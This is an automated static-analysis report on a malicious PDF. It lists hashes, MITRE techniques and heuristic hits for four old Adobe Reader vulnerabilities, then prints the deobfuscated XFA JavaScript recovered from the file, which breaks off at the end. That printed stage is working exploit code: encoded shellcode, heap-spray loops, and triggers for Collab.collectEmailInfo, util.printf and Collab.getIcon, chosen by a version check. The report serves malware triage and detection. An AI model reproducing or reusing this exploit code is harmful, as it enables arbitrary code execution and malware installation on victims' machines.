Malicious PDF — malware analysis report

Static analysis result for SHA-256 72d3b6b6541dc902…

Verdict: MALICIOUS
File type: PDF
Size: 3.5 KB
Authoring application: rxode (via va)
MD5: 05fb0d5dbb2d8b095950e043f5719f28
SHA-1: 0dcf74fffbfa9c6b759ab26597274562977b5f72
SHA-256: 72d3b6b6541dc90240664d6d89ca6278dd6b50772ed29b10d1b56280b7cab595
Risk Score: 418

Malware Insights

MITRE ATT&CK

  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF file contains XFA forms with embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities. The deobfuscated JavaScript appears to be a shellcode payload, likely intended to download and execute a second-stage exploit or malware. The specific vulnerabilities targeted are CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (11)

  • media.newPlayer — CVE-2009-4324 (severity critical; CVE exact; rule CVE_2009_4324)
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (Identified after JavaScript deobfuscation.)
  • Collab.getIcon — CVE-2009-0927 (severity critical; CVE exact; rule CVE_2009_0927)
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (Identified after JavaScript deobfuscation.)
  • Collab.collectEmailInfo — CVE-2007-5659 (severity critical; CVE exact; rule CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
  • util.printf — CVE-2008-2992 (severity critical; CVE exact; rule CVE_2008_2992)
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (Identified after JavaScript deobfuscation.)
  • Pidief-style multi-CVE JavaScript dispatcher (severity critical; CVE likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH)
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit (severity critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT)
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Embedded file (severity low; rule PDF_EMBEDDED)
    PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
  • XFA form (severity low; rule PDF_XFA)
    PDF uses XML Forms Architecture, which can contain script logic.
  • Embedded script payload in PDF stream (severity low; rule PDF_EMBEDDED_SCRIPT_PAYLOAD)
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives. This is common in accessible XFA forms but worth surfacing for analyst review.
  • Suspicious extracted artifact (severity info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://ns.adobe.com/xdp/ (in PDF document text)
    • http://www.xfa.org/schema/xci/1.0/ (in PDF document text)
    • http://www.xfa.org/schema/xfa-template/2.5/ (in PDF document text)
    • http://www.xfa.org/schema/xfa-data/1.0/ (in PDF document text)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • embedded_file_obj0004.bin
    SHA-256: 0f47db13b6328c00abd10bd59824b6af24c50e8026735430b8c6942a4a6c31e2
    Kind: pdf-embedded-file
    Source: PDF EmbeddedFile object 4 at offset 0xDB
    Size: 11238 bytes
    Detection: ClamAV: No threats found
    Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob(s).
  • xfa_hex_stage_000.js
    SHA-256: 69de16e110869f36ce74c661b7aa7e482333f94e6328c3996cba8172d936e6f7
    Kind: deobfuscated-js
    Source: XFA hex-decoded JavaScript (decompressed, direct) at offset 0x64C
    Size: 4807 bytes
    Detection: ClamAV: No threats found
    Obfuscation or payload: likely. Carved artifact contains 12 eval/decoder/string-building token(s) and 1 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script (xfa_hex_stage_000.js)
var bjsg = '%u9090%u9090%u16eb%ub1b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u8534%ue2aa%uc3fa%ue5e8%uffff%u6cff%u8489%u8585%u04db%ud969%u8584%u0c85%u0862%u95ca%uea08%ub4d1%ud25e%ud6d4%ud6d6%ud6d6%ud6d6%ud6d0%uedd6%u8481%u8585%ud3d0%uedd6%uebea%u8585%uf0ed%ue9f7%ud1e8%u0bed%u8bcb%u6d69%u85cd%u8585%u6dd5%u85f9%u8585%u557a%u4106%ued8d%u6aca%u80ca%u6dd5%u85e9%u8585%u557a%u4500%u92f0%ud1ef%u76dc%ued2f%u7bf7%u9336%u986d%u8585%ud585%ud46d%u8585%u7a85%ud655%u7bef%u0ced%u84ea%u6d38%u858d%u8585%u6dd5%u85b9%u8585%u557a%ub4e5%ue145%ud50e%u0eb5%u89d7%ud70e%u0e91%uadf7%u9d3c%u8585%ub485%ub47a%u2945%ue4b9%u87f9%ua5a9%u4a44%u8488%u6742%u0475%ude7a%ucf39%u0eef%u95c7%u970e%u5cf0%uc10c%u99a1%u46e4%u0ee5%ua1e9%u0ea1%ub9c0%ud10e%ufd80%u6f84%ucf0e%u0e9d%ua5df%u6e84%ub166%u0ecc%u0eb1%u6b84%u7ab4%u45b4%u2979%u4501%u82f1%u4a44%u8488%u6e42%ube71%ua1f9%uf0ad%u0e64%ua1df%u6e84%u0ee3%uce89%udf0e%u8499%u0e6e%u0e81%u6d84%uc10c%u99a1%u47e4%u858d%u6a6d%u7a7b%ued7a%uf1f1%ubff5%uaaaa%ue6e8%uefeb%uf4e4%ue6ab%ue8ea%ufdaa%ufffc%ub3aa%ue3b1%ue4b5%ue3b5%ue4e4%ue4b2%ue7b1%ue6b6%ub3e3%ub2e7%ub4b7%ub7bc%ub4b1%ub5b7%ue7bd%ub7e3%ue1bc%ub5bc%ub4e1%ue3b6%ub5e1%ub7b1%ue4e6%ue3b7%ub3b2%ue7b7%ub2b4%ub4b2%ubce0%ue7b6%ue4e1%ub2b2%ub3b4%ue4b6%ub3bd%ubde3%ub7b6%ub0b1%ub7e4%ue6bd%ub1b0%ue7b2%ub0e0%ub4e3%ue6b1%ub5e1%ue6b4%ue4bd%ub6b3%ubcb4%ue0b1%ue3e4%ue0e7%ub7e0%ub1b1%ue6bc%ue6bd%ub2b6%ubce0%ue3e6%ub3b7%ue1b0%ub5b6%ue7e4%ubabd%ub8ec%u85b6';function ezvr(ra, qy) {    while (ra.length * 2 < qy) {        ra += ra;    }    ra = ra.substring(0, qy / 2);    return ra;}function bx() {    var dkg = new Array();    var vw = 0x0c0c0c0c;    var addr = 0x400000;    var payload = unescape(bjsg);    var sc_len = payload.length * 2;    var qy = addr - (sc_len + 0x38);    var yarsp = unescape('%u9090%u9090');    yarsp = ezvr(yarsp, qy);    var count2 = (vw - 0x400000) / addr;    for (var count = 0; count < count2; count++) {        dkg[count] = yarsp + payload;    }    var overflow = unescape('%u0c0c%u0c0c');    while 
(overflow.length < 44952) {        overflow += overflow;    }    this.collabStore = Collab.collectEmailInfo({        subj: '',        msg: overflow    });}function printf() {    nop = unescape('%u0A0A%u0A0A%u0A0A%u0A0A');    var payload = unescape(bjsg);    heapblock = nop + payload;    bigblock = unescape('%u0A0A%u0A0A');    headersize = 20;    spray = headersize + heapblock.length;    while (bigblock.length < spray) {        bigblock += bigblock;    }    fillblock = bigblock.substring(0, spray);    block = bigblock.substring(0, bigblock.length - spray);    while (block.length + spray < 0x40000) {        block = block + block + fillblock;    }    mem = new Array();    for (i = 0; i < 1400; i++) {        mem[i] = block + heapblock;    }    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;    util.printf('%45000f', num);}function geticon(sc) {var shellcode=unescape(bjsg);garbage='';while(garbage.length!=480){garbage+=unescape('%u9090');}garbage=garbage+shellcode;nopblock=unescape('%u9090%u9090'); headersize=10;acl=headersize+garbage.length;while(nopblock.length<acl){nopblock+=nopblock;}fillblock=nopblock.substring(0,acl);block=nopblock.substring(0, nopblock.length-acl);while(block.length+acl<0x40000){block=block+block+fillblock;}memory=new Array();for (i=0;i<180;i++){memory[i]=block+garbage;}var buffersize=4012;var buffer=Array(buffersize);for(i=0;i<buffersize;i++){buffer[i]=unescape('%0a%0a%0a%0a');}Collab.getIcon(buffer+'_N.bundle');}aPlugins = app.plugIns;var sv = parseInt(app.viewerVersion.toString().charAt(0));for (var i = 0; i < aPlugins.length; i++) {    if (aPlugins[i].name == 'EScript') {        var lv = aPlugins[i].version;    }}if ((lv == 9) || ((sv == 8) && (lv <= 8.12))) {    geticon();} else if (lv 
== 7.1) {    printf();} else if (((sv == 6) || (sv == 7)) && (lv < 7.11)) {    bx();} else if ((lv >= 9.1) || (
... (truncated)